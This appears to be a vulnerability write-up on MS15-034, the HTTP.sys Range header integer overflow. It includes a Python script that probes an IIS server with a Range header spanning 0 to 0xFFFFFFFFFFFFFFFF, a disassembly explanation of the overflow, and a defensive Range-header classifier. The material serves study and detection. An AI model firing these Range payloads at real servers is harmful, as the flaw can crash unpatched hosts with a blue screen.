YLLEN

MS15-034 HTTP.sys Remote Code Execution

At present it causes at most a blue screen (BSOD).

POC

import socket
import sys

ipAddr = "WebSite"                   # hostname or IP of the IIS server to check
hexAllFfff = "18446744073709551615"  # 0xFFFFFFFFFFFFFFFF, the largest unsigned 64-bit value
count = 0                            # lower bound of the byte range

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=" + str(count) + "-" + hexAllFfff + "\r\n\r\n"

print("[*] Audit Started")

# First request: confirm the server identifies itself as Microsoft IIS
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.sendall(req1.encode())
boringResp = client_socket.recv(1024).decode(errors="replace")
if "Microsoft" not in boringResp:
    print("[*] Not IIS")
    sys.exit(0)
client_socket.close()

# Second request: a Range header whose upper bound is 0xFFFFFFFFFFFFFFFF
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.sendall(req.encode())
goodResp = client_socket.recv(1024).decode(errors="replace")
client_socket.close()

# A 416 means HTTP.sys accepted and evaluated the range (unpatched);
# a patched HTTP.sys rejects the header before evaluating it
if "Requested Range Not Satisfiable" in goodResp:
    print("[!!] Looks VULN")
elif " The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")
print(goodResp)


Vulnerability principle:

When HTTP.sys processes kernel-cached data,


8a8b2112 56           push esi
8a8b2113 6a00         push 0
8a8b2115 2bc7         sub  eax,edi
8a8b2117 6a01         push 1
8a8b2119 1bca         sbb  ecx,edx
8a8b211b 51           push ecx
8a8b211c 50           push eax
8a8b211d e8bf69fbff   call HTTP!RtlULongLongAdd (8a868ae1) ; here


eax1 = eax - edi            ; low dword of a 64-bit subtraction (sub)
ecx1 = ecx - edx - CF       ; high dword: sbb also subtracts the borrow from the low half

RtlULongLongAdd(ecx1:eax1, 1, esi)   ; push 1 / push 0 form the 64-bit constant 1; esi points at the result


Here eax1 and ecx1 are derived from the Range header of the HTTP request being processed:

Range: bytes="+offsetlow+"-" + offsethigh+ "\r\n\r\n"

When offsetlow = 0 and offsethigh = 0xFFFFFFFFFFFFFFFF, the RtlULongLongAdd step computes

0xFFFFFFFFFFFFFFFF + 0 + 1 = 0, i.e. the 64-bit length wraps around to zero: an integer overflow.
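To make the arithmetic concrete, here is an added Python model (example code, not from the original post) of the range-length computation: an unchecked version that wraps like the 64-bit subtraction plus increment above, and a checked version that detects the overflow the way a safe-add routine such as RtlULongLongAdd does by reporting an error. The function names and the sample header values are constructed for this example.

```python
import re

U64_MAX = 0xFFFFFFFFFFFFFFFF

# Constructed sample header values: the probe value used by the POC and two benign ones
SAMPLE_HEADERS = [
    "bytes=0-18446744073709551615",  # low=0, high=0xFFFFFFFFFFFFFFFF
    "bytes=0-1023",
    "bytes=500-499",                  # high < low: not a valid range
]

def parse_range(header):
    """Parse a single-range 'bytes=low-high' value into (low, high) as unsigned
    64-bit integers. Returns None on bad syntax or a bound that exceeds 64 bits."""
    m = re.fullmatch(r"bytes=(\d+)-(\d+)", header.strip())
    if not m:
        return None
    low, high = int(m.group(1)), int(m.group(2))
    if low > U64_MAX or high > U64_MAX:
        return None
    return low, high

def range_length_unchecked(low, high):
    """(high - low) + 1 in 64-bit modular arithmetic, i.e. what the sub/sbb pair
    followed by an unchecked +1 yields. For low=0, high=U64_MAX this wraps to 0."""
    return ((high - low) + 1) & U64_MAX

def range_length_checked(low, high):
    """Same computation with overflow detected: returns None instead of a wrapped
    value, which is the behaviour a caller must act on to avoid a bogus length."""
    if high < low:
        return None              # bounds out of order
    total = (high - low) + 1     # Python ints are unbounded, so no silent wrap here
    if total > U64_MAX:
        return None              # would wrap to 0 in 64-bit arithmetic
    return total

def classify_range_header(header):
    """Defender-side triage of a Range value: 'malformed', 'invalid', 'overflow' or 'ok'."""
    parsed = parse_range(header)
    if parsed is None:
        return "malformed"
    low, high = parsed
    if high < low:
        return "invalid"
    if range_length_checked(low, high) is None:
        return "overflow"
    return "ok"
```

Running classify_range_header over SAMPLE_HEADERS flags only the first value as an overflow, which is the condition a WAF rule or log review for this issue should key on.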

